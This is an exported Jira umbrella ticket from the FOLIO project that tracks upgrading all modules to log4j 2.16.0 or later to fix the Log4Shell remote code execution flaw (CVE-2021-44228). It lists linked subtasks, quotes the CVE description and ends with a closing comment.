[FOLIO-3364] Update everything to log4j >= 2.16.0 fixing remote execution (CVE-2021-44228) Created: 10/Dec/21  Updated: 20/Jan/22  Resolved: 20/Jan/22

Status: Closed
Project: FOLIO
Components: None
Affects versions: None
Fix versions: None

Type: Umbrella Priority: TBD
Reporter: Julian Ladisch Assignee: Unassigned
Resolution: Done Votes: 0
Labels: security
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original estimate: Not Specified

Issue links:
Defines
defines SECURITY-6 Log4j vulnerability CVE-2021-4428 is ... Completed
is defined by EDGCOMMON-38 Upgrade to log4j to 2.16.0, Vert.x 4.2.2 Closed
is defined by MODAT-113 Log4j 2.15.0 fixing remote execution ... Closed
is defined by MODCONF-98 RMB 33.2.1, Vert.x 4.2.1, Log4j 2.15.... Closed
is defined by MODLOGIN-172 RMB 33.2.1, Vertx 4.2.1, Log4j 2.15.0... Closed
is defined by MODLOGSAML-124 RMB 33.2.1, Vertx 4.2.1, Log4j 2.15.0... Closed
is defined by MODPERMS-167 RMB 33.2.1, Vertx 4.2.1, Log4j 2.15.0... Closed
is defined by MODUIMP-58 Log4j 2.15.0 fixing remote execution ... Closed
is defined by OKAPI-1046 Log4j 2.15.0 fixing remote execution ... Closed
is defined by OKAPI-1050 -Dlog4j2.formatMsgNoLookups=true for ... Closed
is defined by RMB-888 Log4j 2.15.0 fixing remote execution ... Closed
is defined by VERTXLIB-6 Log4j 2.15.0 fixing remote execution ... Closed
Relates
relates to FOLIO-3363 Update reference deployments in light... Closed
Sprint:
Development Team: None

 Description   

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.

This umbrella Jira tracks updating all FOLIO modules to log4j >= 2.16.0.



 Comments   
Comment by Craig McNally [ 20/Jan/22 ]

Closing this as I think the work under this umbrella has been completed.

Generated at Thu Feb 08 23:27:33 UTC 2024 using Jira 1001.0.0-SNAPSHOT#100246-sha1:7a5c50119eb0633d306e14180817ddef5e80c75d.